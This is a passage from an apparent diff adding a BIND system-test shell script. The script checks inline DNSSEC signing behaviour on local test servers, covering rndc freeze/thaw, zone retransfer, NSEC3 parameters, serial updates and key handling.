dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking forwarded update on signed zone ($n)" +for i in 1 2 3 4 5 6 7 8 9 10 +do + ret=0 + $DIG $DIGOPTS @10.53.0.3 bits SOA > dig.out.ns3.test$n + grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 + grep "ANSWER: 2," dig.out.ns3.test$n > /dev/null || ret=1 + grep "2011072460" dig.out.ns3.test$n > /dev/null || ret=1 + if [ $ret = 0 ]; then break; fi + sleep 1 +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +$NSUPDATE << EOF +zone noixfr +server 10.53.0.3 ${PORT} +update add noixfr 0 SOA ns4.noixfr. . 2011072460 20 20 1814400 3600 +send +EOF + +n=$((n + 1)) +echo_i "checking forwarded update on hidden primary, noixfr ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.4 noixfr SOA > dig.out.ns4.test$n +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns4.test$n > /dev/null || ret=1 +grep "2011072460" dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking forwarded update on signed zone, noixfr ($n)" +for i in 1 2 3 4 5 6 7 8 9 10 +do + ret=0 + $DIG $DIGOPTS @10.53.0.3 noixfr SOA > dig.out.ns3.test$n + grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 + grep "ANSWER: 2," dig.out.ns3.test$n > /dev/null || ret=1 + grep "2011072460" dig.out.ns3.test$n > /dev/null || ret=1 + if [ $ret = 0 ]; then break; fi + sleep 1 +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +ret=0 +n=$((n + 1)) +echo_i "checking turning on of inline signing in a secondary zone via reload ($n)" +$DIG $DIGOPTS @10.53.0.5 +dnssec bits SOA > dig.out.ns5.test$n +grep "status: NOERROR" dig.out.ns5.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns5.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "setup broken"; fi +status=$((status + ret)) +copy_setports ns5/named.conf.post ns5/named.conf +(cd ns5; $KEYGEN -q -a ${DEFAULT_ALGORITHM} bits) > /dev/null 2>&1 +(cd ns5; $KEYGEN -q -a ${DEFAULT_ALGORITHM} -f KSK bits) > /dev/null 2>&1 +rndc_reload ns5 10.53.0.5 +for i in 1 2 3 4 5 6 7 8 9 10 +do + ret=0 + $DIG $DIGOPTS @10.53.0.5 bits SOA > dig.out.ns5.test$n + grep "status: NOERROR" dig.out.ns5.test$n > /dev/null || ret=1 + grep "ANSWER: 2," dig.out.ns5.test$n > /dev/null || ret=1 + if [ $ret = 0 ]; then break; fi + sleep 1 +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking rndc freeze/thaw of dynamic inline zone no change ($n)" +ret=0 +$RNDCCMD 10.53.0.3 freeze dynamic > freeze.test$n 2>&1 || { echo_i "/' < freeze.test$n"; ret=1; } +sleep 1 +$RNDCCMD 10.53.0.3 thaw dynamic > thaw.test$n 2>&1 || { echo_i "rndc thaw dynamic failed" ; ret=1; } +sleep 1 +grep "zone dynamic/IN (unsigned): ixfr-from-differences: unchanged" ns3/named.run > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + + +n=$((n + 1)) +echo_i "checking rndc freeze/thaw of dynamic inline zone ($n)" +ret=0 +$RNDCCMD 10.53.0.3 freeze dynamic > freeze.test$n 2>&1 || ret=1 +sleep 1 +awk '$2 == ";" && $3 ~ /serial/ { printf("%d %s %s\n", $1 + 1, $2, $3); next; } + { print; } + END { print "freeze1.dynamic. 0 TXT freeze1"; } ' ns3/dynamic.db > ns3/dynamic.db.new +mv ns3/dynamic.db.new ns3/dynamic.db +$RNDCCMD 10.53.0.3 thaw dynamic > thaw.test$n 2>&1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "check added record freeze1.dynamic ($n)" +for i in 1 2 3 4 5 6 7 8 9 +do + ret=0 + $DIG $DIGOPTS @10.53.0.3 freeze1.dynamic TXT > dig.out.ns3.test$n + grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 + grep "ANSWER: 2," dig.out.ns3.test$n > /dev/null || ret=1 + test $ret = 0 && break + sleep 1 +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +# allow 1 second so that file time stamps change +sleep 1 + +n=$((n + 1)) +echo_i "checking rndc freeze/thaw of server ($n)" +ret=0 +$RNDCCMD 10.53.0.3 freeze > freeze.test$n 2>&1 || ret=1 +sleep 1 +awk '$2 == ";" && $3 ~ /serial/ { printf("%d %s %s\n", $1 + 1, $2, $3); next; } + { print; } + END { print "freeze2.dynamic. 0 TXT freeze2"; } ' ns3/dynamic.db > ns3/dynamic.db.new +mv ns3/dynamic.db.new ns3/dynamic.db +$RNDCCMD 10.53.0.3 thaw > thaw.test$n 2>&1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "check added record freeze2.dynamic ($n)" +for i in 1 2 3 4 5 6 7 8 9 +do + ret=0 + $DIG $DIGOPTS @10.53.0.3 freeze2.dynamic TXT > dig.out.ns3.test$n + grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 + grep "ANSWER: 2," dig.out.ns3.test$n > /dev/null || ret=1 + test $ret = 0 && break + sleep 1 +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "check rndc reload allows reuse of inline-signing zones ($n)" +ret=0 +{ $RNDCCMD 10.53.0.3 reload 2>&1 || ret=1 ; } | sed 's/^/ns3 /' | cat_i +grep "not reusable" ns3/named.run > /dev/null 2>&1 && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "check rndc sync removes both signed and unsigned journals ($n)" +ret=0 +[ -f ns3/dynamic.db.jnl ] || ret=1 +[ -f ns3/dynamic.db.signed.jnl ] || ret=1 +$RNDCCMD 10.53.0.3 sync -clean dynamic 2>&1 || ret=1 +[ -f ns3/dynamic.db.jnl ] && ret=1 +[ -f ns3/dynamic.db.signed.jnl ] && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +$NSUPDATE << EOF +zone retransfer +server 10.53.0.2 ${PORT} +update add added.retransfer 0 A 1.2.3.4 +send + +EOF + +n=$((n + 1)) +echo_i "checking that the retransfer record is added on the hidden primary ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.2 added.retransfer A > dig.out.ns2.test$n +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that the change has not been transferred due to notify ($n)" +ret=0 +for i in 0 1 2 3 4 5 6 7 8 9 +do + ans=0 + $DIG $DIGOPTS @10.53.0.3 added.retransfer A > dig.out.ns3.test$n + grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ans=1 + [ $ans = 0 ] && break + sleep 1 +done +if [ $ans != 1 ]; then echo_i "failed"; ret=1; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "check rndc retransfer of a inline secondary zone works ($n)" +ret=0 +$RNDCCMD 10.53.0.3 retransfer retransfer 2>&1 || ret=1 +for i in 0 1 2 3 4 5 6 7 8 9 +do + ans=0 + $DIG $DIGOPTS @10.53.0.3 added.retransfer A > dig.out.ns3.test$n + grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ans=1 + grep "ANSWER: 2," dig.out.ns3.test$n > /dev/null || ans=1 + [ $ans = 0 ] && break + sleep 1 +done +[ $ans = 1 ] && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "check 'rndc signing -nsec3param' requests are queued for zones which are not loaded ($n)" +ret=0 +# The "retransfer3" zone is configured with "allow-transfer { none; };" on ns2, +# which means it should not yet be available on ns3. +$DIG $DIGOPTS @10.53.0.3 retransfer3 SOA > dig.out.ns3.pre.test$n +grep "status: SERVFAIL" dig.out.ns3.pre.test$n > /dev/null || ret=1 +# Switch the zone to NSEC3. An "NSEC3 -> NSEC -> NSEC3" sequence is used purely +# to test that multiple queued "rndc signing -nsec3param" requests are handled +# properly. +$RNDCCMD 10.53.0.3 signing -nsec3param 1 0 0 - retransfer3 > /dev/null 2>&1 || ret=1 +$RNDCCMD 10.53.0.3 signing -nsec3param none retransfer3 > /dev/null 2>&1 || ret=1 +$RNDCCMD 10.53.0.3 signing -nsec3param 1 0 0 - retransfer3 > /dev/null 2>&1 || ret=1 +# Reconfigure ns2 to allow outgoing transfers for the "retransfer3" zone. +sed "s|\(allow-transfer { none; };.*\)|// \1|;" ns2/named.conf > ns2/named.conf.new +mv ns2/named.conf.new ns2/named.conf +$RNDCCMD 10.53.0.2 reconfig || ret=1 +# Request ns3 to retransfer the "retransfer3" zone. +$RNDCCMD 10.53.0.3 retransfer retransfer3 || ret=1 +# Check whether "retransfer3" uses NSEC3 as requested. +for i in 0 1 2 3 4 5 6 7 8 9 +do + ret=0 + $DIG $DIGOPTS @10.53.0.3 nonexist.retransfer3 A > dig.out.ns3.post.test$n.$i + grep "status: NXDOMAIN" dig.out.ns3.post.test$n.$i > /dev/null || ret=1 + grep "NSEC3" dig.out.ns3.post.test$n.$i > /dev/null || ret=1 + test $ret -eq 0 && break + sleep 1 +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "check rndc retransfer of a inline nsec3 secondary retains nsec3 ($n)" +ret=0 +$RNDCCMD 10.53.0.3 signing -nsec3param 1 0 0 - retransfer3 > /dev/null 2>&1 || ret=1 +for i in 0 1 2 3 4 5 6 7 8 9 +do + ans=0 + $DIG $DIGOPTS @10.53.0.3 nonexist.retransfer3 A > dig.out.ns3.pre.test$n + grep "status: NXDOMAIN" dig.out.ns3.pre.test$n > /dev/null || ans=1 + grep "NSEC3" dig.out.ns3.pre.test$n > /dev/null || ans=1 + [ $ans = 0 ] && break + sleep 1 +done +$RNDCCMD 10.53.0.3 retransfer retransfer3 2>&1 || ret=1 +for i in 0 1 2 3 4 5 6 7 8 9 +do + ans=0 + $DIG $DIGOPTS @10.53.0.3 nonexist.retransfer3 A > dig.out.ns3.post.test$n + grep "status: NXDOMAIN" dig.out.ns3.post.test$n > /dev/null || ans=1 + grep "NSEC3" dig.out.ns3.post.test$n > /dev/null || ans=1 + [ $ans = 0 ] && break + sleep 1 +done +[ $ans = 1 ] && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +# NOTE: The test below should be considered fragile. More details can be found +# in the comment inside ns7/named.conf. +n=$((n + 1)) +echo_i "check rndc retransfer of a inline nsec3 secondary does not trigger an infinite loop ($n)" +ret=0 +zone=nsec3-loop +# Add secondary zone using rndc +$RNDCCMD 10.53.0.7 addzone $zone \ + '{ type secondary; primaries { 10.53.0.2; }; file "'$zone'.db"; inline-signing yes; auto-dnssec maintain; };' +# Wait until secondary zone is fully signed using NSEC +for i in 1 2 3 4 5 6 7 8 9 0 +do + ret=1 + $RNDCCMD 10.53.0.7 signing -list $zone > signing.out.test$n 2>&1 + keys=$(grep '^Done signing' signing.out.test$n | wc -l) + [ $keys -eq 3 ] && ret=0 && break + sleep 1 +done +# Switch secondary zone to NSEC3 +$RNDCCMD 10.53.0.7 signing -nsec3param 1 0 2 12345678 $zone > /dev/null 2>&1 +# Wait until secondary zone is fully signed using NSEC3 +for i in 1 2 3 4 5 6 7 8 9 0 +do + ret=1 + nsec3param=$($DIG $DIGOPTS +nodnssec +short @10.53.0.7 nsec3param $zone) + test "$nsec3param" = "1 0 2 12345678" && ret=0 && break + sleep 1 +done +# Attempt to retransfer the secondary zone from primary +$RNDCCMD 10.53.0.7 retransfer $zone +# Check whether the signer managed to fully sign the retransferred zone by +# waiting for a specific SOA serial number to appear in the logs; if this +# specific SOA serial number does not appear in the logs, it means the signer +# has either ran into an infinite loop or crashed; note that we check the logs +# instead of sending SOA queries to the signer as these may influence its +# behavior in a way which may prevent the desired scenario from being +# reproduced (see comment in ns7/named.conf) +for i in 1 2 3 4 5 6 7 8 9 0 +do + ret=1 + grep "ns2.$zone. . 10 20 20 1814400 3600" ns7/named.run > /dev/null 2>&1 + [ $? -eq 0 ] && ret=0 && break + sleep 1 +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "stop bump in the wire signer server ($n)" +ret=0 +stop_server ns3 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "update SOA record while stopped" +cp ns3/master4.db.in ns3/master.db +rm ns3/master.db.jnl + +n=$((n + 1)) +echo_i "restart bump in the wire signer server ($n)" +ret=0 +start_server --noclean --restart --port ${PORT} ns3 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "updates to SOA parameters other than serial while stopped are reflected in signed zone ($n)" +ret=0 +for i in 1 2 3 4 5 6 7 8 9 +do + ans=0 + $DIG $DIGOPTS @10.53.0.3 master SOA > dig.out.ns3.test$n + grep "hostmaster" dig.out.ns3.test$n > /dev/null || ans=1 + grep "ANSWER: 2," dig.out.ns3.test$n > /dev/null || ans=1 + [ $ans = 1 ] || break + sleep 1 +done +[ $ans = 0 ] || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "check that reloading all zones does not cause zone maintenance to cease for inline-signed zones ($n)" +ret=1 +# Ensure "rndc reload" attempts to load ns3/master.db by waiting 1 second so +# that the file modification time has no possibility of being equal to +# the one stored during server startup. +sleep 1 +nextpart ns3/named.run > /dev/null +cp ns3/master5.db.in ns3/master.db +rndc_reload ns3 10.53.0.3 +for i in 1 2 3 4 5 6 7 8 9 10 +do + if nextpart ns3/named.run | grep "zone master.*sending notifies" > /dev/null; then + ret=0 + break + fi + sleep 1 +done +# Sanity check: file updates should be reflected in the signed zone, +# i.e. SOA RNAME should no longer be set to "hostmaster". +$DIG $DIGOPTS @10.53.0.3 master SOA > dig.out.ns3.test$n || ret=1 +grep "hostmaster" dig.out.ns3.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "check that reloading errors prevent synchronization ($n)" +ret=1 +$DIG $DIGOPTS +short @10.53.0.3 master SOA > dig.out.ns3.test$n.1 || ret=1 +sleep 1 +nextpart ns3/named.run > /dev/null +cp ns3/master6.db.in ns3/master.db +rndc_reload ns3 10.53.0.3 +for i in 1 2 3 4 5 6 7 8 9 10 +do + if nextpart ns3/named.run | grep "not loaded due to errors" > /dev/null + then + ret=0 + break + fi + sleep 1 +done +# Sanity check: the SOA record should be unchanged +$DIG $DIGOPTS +short @10.53.0.3 master SOA > dig.out.ns3.test$n.2 || ret=1 +$DIFF dig.out.ns3.test$n.1 dig.out.ns3.test$n.2 > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "check inline-signing with an include file ($n)" +ret=0 +$DIG $DIGOPTS +short @10.53.0.3 master SOA > dig.out.ns3.test$n.1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) +sleep 1 +nextpart ns3/named.run > /dev/null +cp ns3/master7.db.in ns3/master.db +rndc_reload ns3 10.53.0.3 +_includefile_loaded() { + $DIG $DIGOPTS @10.53.0.3 f.master A > dig.out.ns3.test$n + grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || return 1 + grep "ANSWER: 2," dig.out.ns3.test$n > /dev/null || return 1 + grep "10\.0\.0\.7" dig.out.ns3.test$n > /dev/null || return 1 + return 0 +} +retry_quiet 10 _includefile_loaded +# Sanity check: the SOA record should be changed +$DIG $DIGOPTS +short @10.53.0.3 master SOA > dig.out.ns3.test$n.2 || ret=1 +$DIFF dig.out.ns3.test$n.1 dig.out.ns3.test$n.2 > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "test add/del zone combinations ($n)" +ret=0 +for zone in a b c d e f g h i j k l m n o p q r s t u v w x y z +do +$RNDCCMD 10.53.0.2 addzone test-$zone \ + '{ type primary; file "bits.db.in"; allow-transfer { any; }; };' +$DIG $DIGOPTS @10.53.0.2 test-$zone SOA > dig.out.ns2.$zone.test$n +grep "status: NOERROR," dig.out.ns2.$zone.test$n > /dev/null || { ret=1; cat dig.out.ns2.$zone.test$n; } +$RNDCCMD 10.53.0.3 addzone test-$zone \ + '{ type secondary; primaries { 10.53.0.2; }; file "'test-$zone.bk'"; inline-signing yes; auto-dnssec maintain; allow-transfer { any; }; };' +$RNDCCMD 10.53.0.3 delzone test-$zone > /dev/null 2>&1 +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "testing adding external keys to a inline zone ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.3 dnskey externalkey > dig.out.ns3.test$n +for alg in ${DEFAULT_ALGORITHM_NUMBER} ${ALTERNATIVE_ALGORITHM_NUMBER} +do + [ $alg = 13 -a ! -f checkecdsa ] && continue; + + case $alg in + 7) echo_i "checking NSEC3RSASHA1";; + 8) echo_i "checking RSASHA256";; + 13) echo_i "checking ECDSAP256SHA256";; + *) echo_i "checking $alg";; + esac + + dnskeys=$(grep "IN.DNSKEY.25[67] [0-9]* $alg " dig.out.ns3.test$n | wc -l) + rrsigs=$(grep "RRSIG.DNSKEY $alg " dig.out.ns3.test$n | wc -l) + test ${dnskeys:-0} -eq 3 || { echo_i "failed $alg (dnskeys ${dnskeys:-0})"; ret=1; } + test ${rrsigs:-0} -eq 2 || { echo_i "failed $alg (rrsigs ${rrsigs:-0})"; ret=1; } +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "testing imported key won't overwrite a private key ($n)" +ret=0 +key=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} import.example) +cp ${key}.key import.key +# import should fail +$IMPORTKEY -f import.key import.example > /dev/null 2>&1 && ret=1 +rm -f ${key}.private +# private key removed; import should now succeed +$IMPORTKEY -f import.key import.example > /dev/null 2>&1 || ret=1 +# now that it's an external key, re-import should succeed +$IMPORTKEY -f import.key import.example > /dev/null 2>&1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "testing updating inline secure serial via 'rndc signing -serial' ($n)" +ret=0 +$DIG $DIGOPTS nsec3. SOA @10.53.0.3 > dig.out.n3.pre.test$n +newserial=$($PERL -e 'while (<>) { chomp; my @field = split /\s+/; printf("%u\n", $field[6] + 10) if ($field[3] eq "SOA"); }' < dig.out.n3.pre.test$n) +$RNDCCMD 10.53.0.3 signing -serial ${newserial:-0} nsec3 > /dev/null 2>&1 +retry_quiet 5 wait_for_serial 10.53.0.3 nsec3. "${newserial:-0}" dig.out.ns3.post.test$n || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "testing updating inline secure serial via 'rndc signing -serial' with negative change ($n)" +ret=0 +$DIG $DIGOPTS nsec3. SOA @10.53.0.3 > dig.out.n3.pre.test$n +oldserial=$(awk '$4 == "SOA" { print $7 }' dig.out.n3.pre.test$n) +newserial=$($PERL -e 'while (<>) { chomp; my @field = split /\s+/; printf("%u\n", $field[6] - 10) if ($field[3] eq "SOA"); }' < dig.out.n3.pre.test$n) +$RNDCCMD 10.53.0.3 signing -serial ${newserial:-0} nsec3 > /dev/null 2>&1 +sleep 1 +$DIG $DIGOPTS nsec3. SOA @10.53.0.3 > dig.out.ns3.post.test$n +serial=$(awk '$4 == "SOA" { print $7 }' dig.out.ns3.post.test$n) +[ ${oldserial:-0} -eq ${serial:-1} ] || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +# +# Freezing only operates on the raw zone. +# +n=$((n + 1)) +echo_i "testing updating inline secure serial via 'rndc signing -serial' when frozen ($n)" +ret=0 +$DIG $DIGOPTS nsec3. SOA @10.53.0.3 > dig.out.n3.pre.test$n +oldserial=$(awk '$4 == "SOA" { print $7 }' dig.out.n3.pre.test$n) +newserial=$($PERL -e 'while (<>) { chomp; my @field = split /\s+/; printf("%u\n", $field[6] + 10) if ($field[3] eq "SOA"); }' < dig.out.n3.pre.test$n) +$RNDCCMD 10.53.0.3 freeze nsec3 > /dev/null 2>&1 +$RNDCCMD 10.53.0.3 signing -serial ${newserial:-0} nsec3 > /dev/null 2>&1 +$RNDCCMD 10.53.0.3 thaw nsec3 > /dev/null 2>&1 +retry_quiet 5 wait_for_serial 10.53.0.3 nsec3. "${newserial:-0}" dig.out.ns3.post1.test$n || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "testing updating dynamic serial via 'rndc signing -serial' ($n)" +ret=0 +$DIG $DIGOPTS bits. SOA @10.53.0.2 > dig.out.ns2.pre.test$n +newserial=$($PERL -e 'while (<>) { chomp; my @field = split /\s+/; printf("%u\n", $field[6] + 10) if ($field[3] eq "SOA"); }' < dig.out.ns2.pre.test$n) +$RNDCCMD 10.53.0.2 signing -serial ${newserial:-0} bits > /dev/null 2>&1 +retry_quiet 5 wait_for_serial 10.53.0.2 bits. "${newserial:-0}" dig.out.ns2.post.test$n || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "testing updating dynamic serial via 'rndc signing -serial' with negative change ($n)" +ret=0 +$DIG $DIGOPTS bits. SOA @10.53.0.2 > dig.out.ns2.pre.test$n +oldserial=$(awk '$4 == "SOA" { print $7 }' dig.out.ns2.pre.test$n) +newserial=$($PERL -e 'while (<>) { chomp; my @field = split /\s+/; printf("%u\n", $field[6] - 10) if ($field[3] eq "SOA"); }' < dig.out.ns2.pre.test$n) +$RNDCCMD 10.53.0.2 signing -serial ${newserial:-0} bits > /dev/null 2>&1 +retry_quiet 5 wait_for_serial 10.53.0.2 bits. "${newserial:-1}" dig.out.ns2.post1.test$n && ret=1 +retry_quiet 5 wait_for_serial 10.53.0.2 bits. "${oldserial:-1}" dig.out.ns2.post2.test$n || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "testing updating dynamic serial via 'rndc signing -serial' when frozen ($n)" +ret=0 +$DIG $DIGOPTS bits. SOA @10.53.0.2 > dig.out.ns2.pre.test$n +oldserial=$(awk '$4 == "SOA" { print $7 }' dig.out.ns2.pre.test$n) +newserial=$($PERL -e 'while (<>) { chomp; my @field = split /\s+/; printf("%u\n", $field[6] + 10) if ($field[3] eq "SOA"); }' < dig.out.ns2.pre.test$n) +$RNDCCMD 10.53.0.2 freeze bits > /dev/null 2>&1 +$RNDCCMD 10.53.0.2 signing -serial ${newserial:-0} bits > /dev/null 2>&1 +$RNDCCMD 10.53.0.2 thaw bits > /dev/null 2>&1 +retry_quiet 5 wait_for_serial 10.53.0.2 bits. "${newserial:-1}" dig.out.ns2.post1.test$n && ret=1 +retry_quiet 5 wait_for_serial 10.53.0.2 bits. "${oldserial:-1}" dig.out.ns2.post2.test$n || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "testing that inline signing works with inactive ZSK and active KSK ($n)" +ret=0 + +$DIG $DIGOPTS @10.53.0.3 soa inactivezsk > dig.out.ns3.pre.test$n || ret=1 +soa1=$(awk '$4 == "SOA" { print $7 }' dig.out.ns3.pre.test$n) + +$NSUPDATE << EOF +server 10.53.0.2 ${PORT} +update add added.inactivezsk 0 IN TXT added record +send +EOF + +for i in 1 2 3 4 5 6 7 8 9 10 +do + $DIG $DIGOPTS @10.53.0.3 soa inactivezsk > dig.out.ns3.post.test$n || ret=1 + soa2=$(awk '$4 == "SOA" { print $7 }' dig.out.ns3.post.test$n) + test ${soa1:-0} -ne ${soa2:-0} && break + sleep 1 +done +test ${soa1:-0} -ne ${soa2:-0} || ret=1 + +$DIG $DIGOPTS @10.53.0.3 txt added.inactivezsk > dig.out.ns3.test$n || ret=1 +grep "ANSWER: 3," dig.out.ns3.test$n > /dev/null || ret=1 +grep "RRSIG" dig.out.ns3.test$n > /dev/null || ret=1 +grep "TXT ${DEFAULT_ALGORITHM_NUMBER} 2" dig.out.ns3.test$n > /dev/null || ret=1 +grep "TXT ${ALTERNATIVE_ALGORITHM_NUMBER} 2" dig.out.ns3.test$n > /dev/null || ret=1 + +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "testing that inline signing works with inactive KSK and active ZSK ($n)" +ret=0 + +$DIG $DIGOPTS @10.53.0.3 axfr inactiveksk > dig.out.ns3.test$n + +# +# check that DNSKEY is signed with ZSK for default algorithm +# +awk='$4 == "DNSKEY" && $5 == 256 && $7 == alg { print }' +zskid=$(awk -v alg=${DEFAULT_ALGORITHM_NUMBER} "${awk}" dig.out.ns3.test$n | + $DSFROMKEY -A -2 -f - inactiveksk | awk '{ print $4}' ) +grep "DNSKEY ${DEFAULT_ALGORITHM_NUMBER} 1 [0-9]* [0-9]* [0-9]* ${zskid} " dig.out.ns3.test$n > /dev/null || ret=1 +awk='$4 == "DNSKEY" && $5 == 257 && $7 == alg { print }' +kskid=$(awk -v alg=${DEFAULT_ALGORITHM_NUMBER} "${awk}" dig.out.ns3.test$n | + $DSFROMKEY -2 -f - inactiveksk | awk '{ print $4}' ) +grep "DNSKEY ${DEFAULT_ALGORITHM_NUMBER} 1 [0-9]* [0-9]* [0-9]* ${kskid} " dig.out.ns3.test$n > /dev/null && ret=1 + +# +# check that DNSKEY is signed with KSK for alternative algorithm +# +awk='$4 == "DNSKEY" && $5 == 256 && $7 == alg { print }' +zskid=$(awk -v alg=${ALTERNATIVE_ALGORITHM_NUMBER} "${awk}" dig.out.ns3.test$n | + $DSFROMKEY -A -2 -f - inactiveksk | awk '{ print $4}' ) +grep "DNSKEY ${ALTERNATIVE_ALGORITHM_NUMBER} 1 [0-9]* [0-9]* [0-9]* ${zskid} " dig.out.ns3.test$n > /dev/null && ret=1 +awk='$4 == "DNSKEY" && $5 == 257 && $7 == alg { print }' +kskid=$(awk -v alg=${ALTERNATIVE_ALGORITHM_NUMBER} "${awk}" dig.out.ns3.test$n | + $DSFROMKEY -2 -f - inactiveksk | awk '{ print $4}' ) +grep "DNSKEY ${ALTERNATIVE_ALGORITHM_NUMBER} 1 [0-9]* [0-9]* [0-9]* ${kskid} " dig.out.ns3.test$n > /dev/null || ret=1 + +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +# Wait until an update to the raw part of a given inline signed zone is fully +# processed. As waiting for a fixed amount of time is suboptimal and there is +# no single message that would signify both a successful modification and an +# error in a race-free manner, instead wait until either notifies are sent +# (which means the secure zone was modified) or a receive_secure_serial() error +# is logged (which means the zone was not modified and will not be modified any +# further in response to the relevant raw zone update). +wait_until_raw_zone_update_is_processed() { + zone="$1" + for i in 1 2 3 4 5 6 7 8 9 10 + do + if nextpart ns3/named.run | grep -E "zone ${zone}.*(sending notifies|receive_secure_serial)" > /dev/null; then + return + fi + sleep 1 + done +} + +n=$((n + 1)) +echo_i "checking that changes to raw zone are applied to a previously unsigned secure zone ($n)" +ret=0 +# Query for bar.nokeys/A and ensure the response is negative. As this zone +# does not have any signing keys set up, the response must be unsigned. +$DIG $DIGOPTS @10.53.0.3 bar.nokeys. A > dig.out.ns3.pre.test$n 2>&1 || ret=1 +grep "status: NOERROR" dig.out.ns3.pre.test$n > /dev/null && ret=1 +grep "RRSIG" dig.out.ns3.pre.test$n > /dev/null && ret=1 +# Ensure the wait_until_raw_zone_update_is_processed() call below will ignore +# log messages generated before the raw zone is updated. +nextpart ns3/named.run > /dev/null +# Add a record to the raw zone on the primary. +$NSUPDATE << EOF || ret=1 +zone nokeys. +server 10.53.0.2 ${PORT} +update add bar.nokeys. 0 A 127.0.0.1 +send +EOF +wait_until_raw_zone_update_is_processed "nokeys" +# Query for bar.nokeys/A again and ensure the signer now returns a positive, +# yet still unsigned response. +$DIG $DIGOPTS @10.53.0.3 bar.nokeys. A > dig.out.ns3.post.test$n 2>&1 +grep "status: NOERROR" dig.out.ns3.post.test$n > /dev/null || ret=1 +grep "RRSIG" dig.out.ns3.pre.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that changes to raw zone are not applied to a previously signed secure zone with no keys available (primary) ($n)" +ret=0 +# Query for bar.removedkeys-primary/A and ensure the response is negative. As +# this zone has signing keys set up, the response must be signed. +$DIG $DIGOPTS @10.53.0.3 bar.removedkeys-primary. A > dig.out.ns3.pre.test$n 2>&1 || ret=1 +grep "status: NOERROR" dig.out.ns3.pre.test$n > /dev/null && ret=1 +grep "RRSIG" dig.out.ns3.pre.test$n > /dev/null || ret=1 +# Remove the signing keys for this zone. +mv -f ns3/Kremovedkeys-primary* 